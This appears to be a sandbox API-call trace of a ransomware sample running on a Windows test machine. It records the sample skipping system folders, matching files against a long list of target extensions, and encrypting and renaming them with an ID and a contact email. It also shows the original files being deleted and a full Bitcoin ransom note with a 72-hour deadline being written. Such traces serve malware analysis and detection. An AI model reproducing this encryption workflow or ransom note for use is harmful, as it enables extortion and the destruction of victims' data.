	[0201.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.762] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="appdata") returned 0x0
	[0201.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.762] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="application data") returned 0x0
	[0201.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.763] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="winnt") returned 0x0
	[0201.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.763] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="tmp") returned 0x0
	[0201.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.763] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="cache") returned 0x0
	[0201.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.763] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.764] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="webcache") returned 0x0
	[0201.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.764] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="inetcache") returned 0x0
	[0201.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.764] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="nvidia") returned 0x0
	[0201.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.764] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="packages") returned 0x0
	[0201.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.765] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="cookies") returned 0x0
	[0201.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.765] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="programdata") returned 0x0
	[0201.765] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0xf54d5100, ftLastAccessTime.dwHighDateTime=0x1d9722d, ftLastWriteTime.dwLowDateTime=0xf54d5100, ftLastWriteTime.dwHighDateTime=0x1d9722d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0201.765] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ac332c0, ftCreationTime.dwHighDateTime=0x1d96c44, ftLastAccessTime.dwLowDateTime=0xbeee2920, ftLastAccessTime.dwHighDateTime=0x1d97103, ftLastWriteTime.dwLowDateTime=0xbeee2920, ftLastWriteTime.dwHighDateTime=0x1d97103, nFileSizeHigh=0x0, nFileSizeLow=0x17ce7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ffcPaKhRpmQfmcr.mkv", cAlternateFileName="FFCPAK~1.MKV")) returned 1
	[0201.765] lstrcmpW (lpString1="ffcPaKhRpmQfmcr.mkv", lpString2="..") returned 1
	[0201.765] lstrcmpW (lpString1="ffcPaKhRpmQfmcr.mkv", lpString2=".") returned 1
	[0201.766] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\"
	[0201.766] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\", lpString2="ffcPaKhRpmQfmcr.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\ffcPaKhRpmQfmcr.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\ffcPaKhRpmQfmcr.mkv"
	[0201.766] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\ffcPaKhRpmQfmcr.mkv") returned 77
	[0201.766] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.766] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\ffcPaKhRpmQfmcr.mkv", cchLength=0x4d | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv") returned 0x4d
	[0201.766] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.766] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.766] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv"
	[0201.767] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv") returned 77
	[0201.767] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.828] StrStrW (lpFirst=".mkv", lpSrch=".") returned=".mkv"
	[0201.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.829] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mkv") returned=".mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.829] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.829] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.829] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0202.086] ReadFile (in: hFile=0x388, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x17ce7, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x18a640*=0x17ce7, lpOverlapped=0x0) returned 1
	[0202.090] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.090] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0202.092] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.093] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0202.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.093] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0202.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.093] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb93b0) returned 1
	[0202.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.093] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x17ce7, dwBufLen=0x17ce7 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x17cf0) returned 1
	[0202.098] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.098] RtlMoveMemory (in: Destination=0xff8e90, Source=0xfe11a0, Length=0x17ce7 | out: Destination=0xff8e90) 
	[0202.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.099] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff8e90*, pdwDataLen=0x18a1ec*=0x17ce7, dwBufLen=0x17cf0 | out: pbData=0xff8e90*, pdwDataLen=0x18a1ec*=0x17cf0) returned 1
	[0202.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.099] CryptDestroyKey (hKey=0xfb93b0) returned 1
	[0202.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.099] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0202.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.099] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0202.100] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.100] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.101] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0202.102] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 119
	[0202.102] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0202.106] WriteFile (in: hFile=0x390, lpBuffer=0xff8e90*, nNumberOfBytesToWrite=0x17cf0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff8e90*, lpNumberOfBytesWritten=0x18a648*=0x17cf0, lpOverlapped=0x0) returned 1
	[0202.113] CloseHandle (hObject=0x390) returned 1
	[0202.114] CloseHandle (hObject=0x388) returned 1
	[0202.114] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv")) returned 1
	[0202.122] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\ffcpakhrpmqfmcr.mkv")) returned 0
	[0202.122] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x309286a0, ftLastAccessTime.dwHighDateTime=0x1d9734f, ftLastWriteTime.dwLowDateTime=0x309286a0, ftLastWriteTime.dwHighDateTime=0x1d9734f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0OT", cAlternateFileName="")) returned 1
	[0202.122] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x309286a0, ftLastAccessTime.dwHighDateTime=0x1d9734f, ftLastWriteTime.dwLowDateTime=0x309286a0, ftLastWriteTime.dwHighDateTime=0x1d9734f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0OT", cAlternateFileName="")) returned 0
	[0202.122] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0202.122] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0202.123] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg"
	[0202.123] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*"
	[0202.123] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.123] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.123] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\HELP_DECRYPT_YOUR_FILES.TXT") returned 85
	[0202.123] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0202.124] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0202.124] WriteFile (in: hFile=0x2c0, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0202.128] CloseHandle (hObject=0x2c0) returned 1
	[0202.128] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.129] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0202.130] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0202.130] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0202.130] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0202.131] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0202.131] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
